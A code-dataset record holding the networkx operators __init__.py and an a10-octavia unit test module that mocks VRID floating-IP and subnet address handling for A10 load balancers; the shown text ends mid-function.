|
2022-03-31T22:06:00.000Z
|
networkx/algorithms/operators/__init__.py
|
jebogaert/networkx
|
8563c3313223a53c548530f39c8cfb6e433539d3
|
[
"BSD-3-Clause"
] | 3,272
|
2015-01-01T05:04:53.000Z
|
2022-03-31T17:46:35.000Z
|
from networkx.algorithms.operators.all import *
from networkx.algorithms.operators.binary import *
from networkx.algorithms.operators.product import *
from networkx.algorithms.operators.unary import *
| 40.2
| 51
| 0.840796
| 24
| 201
| 7.041667
| 0.375
| 0.284024
| 0.52071
| 0.733728
| 0.656805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079602
| 201
| 4
| 52
| 50.25
| 0.913514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0ed33d11a8fa5c79dd0d91abb6b9d1f561a683c4
| 31,586
|
py
|
Python
|
a10_octavia/tests/unit/controller/worker/tasks/test_a10_network_tasks.py
|
rahulkatre-a10/a10-octavia
|
cb210069afa5fb3fb2881bbb0aa94da6b6cd5789
|
[
"Apache-2.0"
] | null | null | null |
a10_octavia/tests/unit/controller/worker/tasks/test_a10_network_tasks.py
|
rahulkatre-a10/a10-octavia
|
cb210069afa5fb3fb2881bbb0aa94da6b6cd5789
|
[
"Apache-2.0"
] | null | null | null |
a10_octavia/tests/unit/controller/worker/tasks/test_a10_network_tasks.py
|
rahulkatre-a10/a10-octavia
|
cb210069afa5fb3fb2881bbb0aa94da6b6cd5789
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import imp
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from octavia.common import data_models as o_data_models
from octavia.network import data_models as o_net_data_models
from a10_octavia.common import config_options
from a10_octavia.common import data_models
from a10_octavia.controller.worker.tasks import a10_network_tasks
from a10_octavia.tests.common import a10constants
from a10_octavia.tests.unit import base
LB = o_data_models.LoadBalancer(id=a10constants.MOCK_LOAD_BALANCER_ID)
MEMBER = o_data_models.Member(subnet_id=a10constants.MOCK_SUBNET_ID)
VTHUNDER = data_models.VThunder()
SUBNET = o_net_data_models.Subnet()
PORT = o_net_data_models.Port()
VRID = data_models.VRID()
VRID_VALUE = 0
SUBNET_1 = o_net_data_models.Subnet(id=a10constants.MOCK_SUBNET_ID)
VRID_1 = data_models.VRID(id=1, subnet_id=a10constants.MOCK_SUBNET_ID)
NAT_POOL = data_models.NATPool(port_id=a10constants.MOCK_PORT_ID)
NAT_FLAVOR = {"pool_name": "p1", "start_address": "1.1.1.1", "end_address": "1.1.1.2"}
HW_THUNDER = data_models.HardwareThunder(
project_id=a10constants.MOCK_PROJECT_ID,
device_name="rack_thunder_1",
undercloud=True,
username="abc",
password="abc",
ip_address="10.10.10.10",
partition_name="shared")
HW_THUNDER2 = data_models.HardwareThunder(
project_id=a10constants.MOCK_PROJECT_ID,
device_name="rack_thunder_2",
undercloud=True,
username="abc",
password="abc",
ip_address="10.10.10.11",
partition_name="shared",
vrid_floating_ip="192.168.8.126")
EXISTING_FIP_SHARED_PARTITION = {
u'vrid': {u'blade-parameters': {
u'priority': 150, u'uuid': u'41e54b26-bc4f-11eb-bd71-525400895118',
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0/blade-parameters'},
u'uuid': u'41e5439c-bc4f-11eb-bd71-525400895118', u'floating-ip': {
u'ip-address-cfg': [{
u'ip-address': u'192.168.8.140'}, {u'ip-address': u'192.168.9.140'}]},
u'vrid-val': 0, u'preempt-mode': {u'threshold': 0, u'disable': 0},
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0'}
}
EXISTING_FIP_L3V_PARTITION = {
u'vrid': {u'blade-parameters': {
u'priority': 150, u'uuid': u'41e54b26-bc4f-11eb-bd71-525400895118',
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0/blade-parameters'},
u'uuid': u'41e5439c-bc4f-11eb-bd71-525400895118', u'floating-ip': {
u'ip-address-part-cfg': [{
u'ip-address-partition': u'192.168.8.140'},
{u'ip-address-partition': u'192.168.9.140'}]},
u'vrid-val': 0, u'preempt-mode': {u'threshold': 0, u'disable': 0},
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0'}
}
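# Note (added): the two fixtures above differ only in how the axAPI payload reports floating IPs --
# the shared-partition payload lists them under 'ip-address-cfg', while the L3V (named partition)
# payload uses 'ip-address-part-cfg'. The tests below pair the shared fixture with the default
# partition (asserting is_partition=False) and the L3V fixture with a named partition
# (asserting is_partition=True).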
class MockIP(object):
def __init__(self, ip_address):
self.ip_address = ip_address
class MockNic(object):
def __init__(self, net_id):
self.network_id = net_id
self.subnet_id = net_id
class TestNetworkTasks(base.BaseTaskTestCase):
def setUp(self):
super(TestNetworkTasks, self).setUp()
imp.reload(a10_network_tasks)
patcher = mock.patch(
'a10_octavia.controller.worker.tasks.a10_network_tasks.BaseNetworkTask.network_driver')
self.network_driver_mock = patcher.start()
self.client_mock = mock.Mock()
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
self.conf.register_opts(config_options.A10_GLOBAL_OPTS,
group=a10constants.A10_GLOBAL_OPTS)
def tearDown(self):
super(TestNetworkTasks, self).tearDown()
self.conf.reset()
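# Note (added): every test below follows the fixture pattern set up above -- the class-level
# network_driver property of BaseNetworkTask is replaced by self.network_driver_mock, each task
# instance gets self.client_mock injected as its axapi_client, and the oslo_config fixture is
# used to set A10 global options such as `vrid` per test.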
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=None)
def test_HandleVRIDFloatingIP_noop_vrrpa_config_not_specified(
self, mock_utils):
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
result = mock_network_task.execute(VTHUNDER, MEMBER, [], subnet, vthunder_config)
self.assertEqual(result, [])
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
def test_HandleVRIDFloatingIP_create_floating_ip_in_shared_partition_with_static_ip(
self, mock_patched_ip, mock_floating_ip):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_1)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
def test_HandleVRIDFloatingIP_create_floating_ip_with_device_name_flavor(
self, mock_patched_ip):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER2)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [], subnet,
vthunder_config, use_device_flavor=True)
mock_network_task.axapi_client.get_vrid_floating_ip_for_project.assert_not_called()
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_create_floating_ip_in_specified_partition_with_static_ip(
self, mock_utils, mock_patched_ip, get_floating_ip):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.partition_name = 'partition_1'
vthunder.ip_address = '10.0.0.1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_1)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_1], is_partition=True)
@mock.patch(
'a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
def test_HandleVRIDFloatingIP_create_floating_ip_in_shared_partition_with_dhcp(
self, get_floating_ip, check_subnet):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [VRID_1], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, None, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
@mock.patch(
'a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
def test_HandleVRIDFloatingIP_create_floating_ip_in_specified_partition_with_dhcp(
self, get_floating_ip, check_subnet):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.partition_name = 'partition_1'
vthunder.ip_address = '10.0.0.1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [VRID_1], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, None, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_1], is_partition=True)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=None)
def test_HandleVRIDFloatingIP_delete_fip_entries_device_fip_given_but_no_fip_in_conf(
self, mock_utils):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
vthunder_config = copy.deepcopy(HW_THUNDER)
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, MEMBER, [vrid], SUBNET_1, vthunder_config)
self.network_driver_mock.delete_port.assert_called_with(
vrid.vrid_port_id)
self.client_mock.vrrpa.update.assert_called_with(
vrid.vrid, floating_ips=[], is_partition=False)
self.assertEqual(result, [])
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
def test_HandleVRIDFloatingIP_noop_device_fip_and_conf_fip_both_given_same_ip(
self, mock_patched_ip, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_not_called()
self.client_mock.vrrpa.update.assert_not_called()
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_in_shared_partition_with_static_ip(
self, mock_utils, mock_patched_ip, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_2))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, subnet.network_id, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_2)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_2],
is_partition=False)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_in_specified_partition_with_static_ip(
self, mock_utils, mock_patched_ip, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_2))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vthunder.partition_name = 'partition_1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, None, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_2)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_2], is_partition=True)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
def test_HandleVRIDFloatingIP_noop_given_same_subnet_with_conf_fip_set_to_dhcp(
self, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
fip_port = mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_not_called()
self.network_driver_mock.delete_port.assert_not_called()
self.assertEqual(fip_port, [vrid])
@mock.patch(
'a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_diff_subnet_in_shared_part_conf_fip_set_dhcp(
self, mock_utils, get_floating_ip, check_subnet):
vrid = copy.deepcopy(VRID_1)
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, subnet.network_id, mock.ANY, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch('a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_diff_subnet_in_set_part_conf_fip_set_dhcp(
self, mock_utils, get_floating_ip, check_subnet):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.partition_name = 'partition_1'
vthunder.ip_address = '10.0.0.1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, subnet.network_id, mock.ANY, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_1], is_partition=True)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_PARTIAL_FLOATING_IP)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_creating_floating_ip_conf_fip_is_partial(
self, get_floating_ip, mock_utils):
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FULL_FLOATING_IP))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [VRID_1], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, subnet.network_id, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FULL_FLOATING_IP)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FULL_FLOATING_IP],
is_partition=False)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_DeleteMemberVRIDPort_delete_vrid_ip_member_count_equals_one(self, mock_utils):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
mock_network_task.axapi_client = self.client_mock
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
result = mock_network_task.execute(VTHUNDER, [vrid], SUBNET_1, False,
0, 1, 0, 0, MEMBER)
self.network_driver_mock.deallocate_vrid_fip.assert_called_with(
vrid, mock.ANY, mock.ANY)
self.client_mock.vrrpa.update.assert_called_with(
vrid.vrid, floating_ips=[])
self.assertEqual(result, (vrid, True))
def test_DeleteMemberVRIDPort_member_count_lb_count(self):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, [VRID_1], SUBNET_1, False,
1, 1, 0, 0, MEMBER)
self.network_driver_mock.deallocate_vrid_fip.assert_not_called()
self.client_mock.vrrpa.delete.assert_not_called()
self.assertEqual(result, (None, False))
def delete_multi_vrid_port_against_subnet_not_used(self):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, [vrid], [SUBNET_1])
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
self.client_mock.vrrpa.update.assert_called_with(
vrid.vrid, floating_ips=[], is_partition=False)
self.assertEqual(result, [])
def delete_multi_vrid_port_against_all_subnet_used(self):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, [vrid], [])
self.network_driver_mock.delete_port.assert_not_called()
self.client_mock.vrrpa.update.assert_not_called()
self.assertEqual(result, None)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_reserve_subnet_addr_for_member(self, mock_utils):
mock_network_task = a10_network_tasks.ReserveSubnetAddressForMember()
mock_network_task.network_driver = self.client_mock
mock_network_task.execute(MEMBER, NAT_FLAVOR)
self.client_mock.reserve_subnet_addresses.assert_called_with(
MEMBER.subnet_id, ["1.1.1.1", "1.1.1.2"], mock.ANY)
def test_release_subnet_addr_referenced(self):
mock_network_task = a10_network_tasks.ReleaseSubnetAddressForMember()
NAT_POOL.member_ref_count = 2
ret_val = mock_network_task.execute(MEMBER, NAT_FLAVOR, NAT_POOL)
self.assertEqual(ret_val, None)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_release_subnet_addr(self, mock_utils):
